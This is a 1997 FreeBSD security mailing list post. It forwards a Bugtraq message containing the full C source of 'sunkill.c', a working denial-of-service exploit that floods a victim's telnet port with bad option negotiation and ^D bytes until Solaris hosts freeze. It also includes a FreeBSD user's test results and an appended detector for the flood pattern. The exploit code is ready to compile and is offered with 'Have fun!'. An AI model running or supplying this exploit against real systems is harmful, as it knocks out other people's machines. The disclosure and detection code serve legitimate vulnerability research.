Date: Sun, 14 Dec 1997 22:52:52 -0800 (PST)
From: Jan Koum <jkb@best.com>
To: freebsd-security@freebsd.org
Subject: To kill a sun: (fwd)
Message-ID: <Pine.BSF.3.96.971214223836.1241A-100000@shell6.ba.best.com>

Hi all,

I tried this against my 2.2.5-RELEASE machine which is on the ethernet
with another FreeBSD (3.0-CURRENT) machine. The 2.2.5 one is usually doing
nothing but running an rc5-64 client (Go team FreeBSD Japan!). Here is
what top showed:

last pid: 20938;  load averages:  2.04,  1.65,  1.30    22:42:21
16 processes:  3 running, 13 sleeping
CPU states: 81.5% user,  0.0% nice,  5.0% system, 13.5% interrupt,  0.0% idle
Mem: 13M Active, 1152K Inact, 7564K Wired, 7624K Cache, 3606K Buf, 1896K Free
Swap: 128M Total, 96K Used, 128M Free

  PID USERNAME PRI NICE  SIZE   RES STATE    TIME   WCPU    CPU COMMAND
 3616 jkb       53  -20  824K  316K RUN    222.7H 68.89% 68.89% rc564
20923 root      63    0  192K  616K RUN      1:21 27.35% 27.35% telnetd
                                                         ^^^^^^^^^^^^^
16129 root       2    0  492K  720K select  15:33  1.45%  1.45% ppp
20932 jkb       29    0  600K  796K RUN      0:01  0.04%  0.04% top
  134 root      18    0  332K  416K pause    0:46  0.00%  0.00% cron
  171 jkb       18    4  452K  284K pause    0:00  0.00%  0.00% csh

Usually the load is at 1.00 since I have rc564 running with priority of
-20. But this time it was 2.xx -- I guess telnetd doubled it this time.

Running this against 3.0-CURRENT (from a week ago or so) wasn't as
horrible and showed this:

last pid:  4861;  load averages:  0.18,  0.65,  0.48    22:45:12
39 processes:  2 running, 37 sleeping
CPU states: 23.3% user,  0.0% nice,  3.9% system,  1.6% interrupt, 71.2% idle
Mem: 19M Active, 21M Inact, 11M Wired, 9384K Cache, 4942K Buf, 828K Free
Swap: 256M Total, 84M Used, 172M Free, 33% Inuse

  PID USERNAME PRI NICE   SIZE    RES STATE    TIME   WCPU    CPU COMMAND
 2894 jkb        2    0 40228K 14716K RUN    121:26  7.21%  7.21% netscape
 2867 jkb        2    0 19156K 15788K select  37:14  4.46%  4.46% Xaccel
 4855 root       2    0   204K   432K sbwait   0:00  2.22%  1.83% telnetd
                                                            ^^^^^^^^^^^^
 4858 jkb       28    0   820K   636K RUN      0:00  0.82%  0.61% top
 2868 jkb        2    0   436K   456K select   0:23  0.15%  0.15% afterstep
 3165 jkb        2    0   708K   344K select   0:01  0.08%  0.08% ssh

Does that mean that 2.2.5 is vulnerable to a little DoS? I am comparing
it to 3.0 which handles it with a lot of grace.

-- Yan

---------- Forwarded message ----------
Date: Sat, 13 Dec 1997 15:48:51 -0500
From: Jason Zapman II <zapman@CC.GATECH.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: To kill a sun:

This is sunkill.c

It affects at least Solaris 2.5.1 machines, both sun4c and sun4m
architectures. I imagine it affects all Solaris 2.5.1 machines, both
sparc and x86, but I'm not sure.

It basically works by opening a telnet connection on the victim machine
and sends a few bad telnet negotiation options, then floods the port with
lots of ^D characters. This uses all the streams memory (I think) on the
victim's machine and causes the kernel to get very angry. The machine
crawls to a halt, the cursor in X stops moving, the machine is
unresponsive to the network. It's a bad situation all around.

/*
** To make, if your system is BSD'ish: gcc <thisfile>
** ...if your system is SysV'ish: gcc -lnsl -lsocket <thisfile>
**
** Usage: a.out <victim's hostname>
**
** Have fun!
*/

#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/telnet.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 100
#define DOTS

void catchit(void)
{
    printf("\nCaught SIGPIPE -- your link may be too slow.\n");
    exit(1);
}

int main(int argc, char *argv[])
{
    unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO, \
    TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
    TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};

    unsigned char nastybuf[BUFSIZE];
    struct sockaddr_in sin;
    struct servent *sp;
    struct hostent *hp;
    int s;

    typedef void (*sig_t) (int);
    signal(SIGPIPE,(sig_t)catchit);

    memset(nastybuf,4,BUFSIZE); /* ascii 4 = ^D */

    if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
        printf("no socket\n");
        exit(1);
    }

    if (!(hp = gethostbyname(argv[1]))) {
        printf("unknown host\n");
        exit(1);
    }

    bzero(&sin,sizeof(sin));
    bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
    sin.sin_family = AF_INET;
    sp = getservbyname("telnet","tcp");
    sin.sin_port = sp->s_port;

    if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
        printf("can't connect to host\n");
        exit(1);
    }

    printf("connected to %s\n",argv[1]);
    write(s,kludge_telopt,21); /* kludge some telnet negotiation */

    /* "Let them eat ^Ds..." */

    while (write(s,nastybuf,BUFSIZE) != -1) {

#ifdef DOTS
        write(STDOUT_FILENO,".",1);
#endif
    }
}

Jason

--
Jason Price        | If you want to build a ship, don't drum up people
Theta Xi,          | together to collect wood and don't assign them tasks
Beta, Alpha 449    | and work, but rather teach them to long for the endless
jprice@poboxes.com | immensity of the sea.  -- Antoine de Saint Exupery
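
Added example, not part of the original posts: a defender-side check for the traffic pattern the forwarded message describes (a few telnet option commands followed by a flood of ^D bytes). It parses a captured client-to-server telnet byte stream and flags one whose data is almost entirely one long run of ^D; the function names, the constructed sample bytes and the 256-byte / 90% thresholds are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

enum { IAC = 255, SB = 250, SE = 240, WILL = 251, DONT = 254, EOT = 4 };

/* options: IAC WILL/WONT/DO/DONT seen; data: bytes left after removing commands;
   eot: data bytes equal to ^D; max_run: longest unbroken run of ^D. */
struct telnet_stats { size_t options, data, eot, max_run; };

/* Split a client-to-server telnet byte stream into commands and data. */
struct telnet_stats telnet_scan(const unsigned char *p, size_t n)
{
    struct telnet_stats st = {0, 0, 0, 0};
    size_t i = 0, run = 0;
    while (i < n) {
        if (p[i] == IAC && i + 1 < n && p[i + 1] != IAC) {
            unsigned char cmd = p[i + 1];
            i += 2;
            if (cmd >= WILL && cmd <= DONT) { st.options++; i++; }
            else if (cmd == SB) {            /* skip through IAC SE */
                while (i + 1 < n && !(p[i] == IAC && p[i + 1] == SE)) i++;
                i += 2;
            }
            continue;                        /* other commands are 2 bytes */
        }
        if (p[i] == IAC && i + 1 < n) i++;   /* IAC IAC is one 0xFF data byte */
        st.data++;
        if (p[i] == EOT) { st.eot++; if (++run > st.max_run) st.max_run = run; }
        else run = 0;
        i++;
    }
    return st;
}

/* Heuristic (thresholds are assumptions): a ^D run of at least min_run
   bytes, with ^D making up at least 90% of all data bytes. */
int telnet_eot_flood(const unsigned char *p, size_t n, size_t min_run)
{
    struct telnet_stats st = telnet_scan(p, n);
    return st.max_run >= min_run && st.eot * 10 >= st.data * 9;
}

/* Constructed sample: three option commands, "ls\r\n", then n_eot bytes of ^D. */
int sample_verdict(size_t n_eot)
{
    static unsigned char buf[13 + 4096] =
        {255,252,24, 255,253,3, 255,252,31, 'l','s','\r','\n'};
    if (n_eot > 4096) n_eot = 4096;
    memset(buf + 13, EOT, n_eot);
    return telnet_eot_flood(buf, 13 + n_eot, 256);
}

int main(void) { printf("%d %d\n", sample_verdict(400), sample_verdict(1)); return 0; }
```

A single ^D at the end of an interactive session is normal end-of-file input, which is why the check requires both a long run and a high ^D share before flagging a stream.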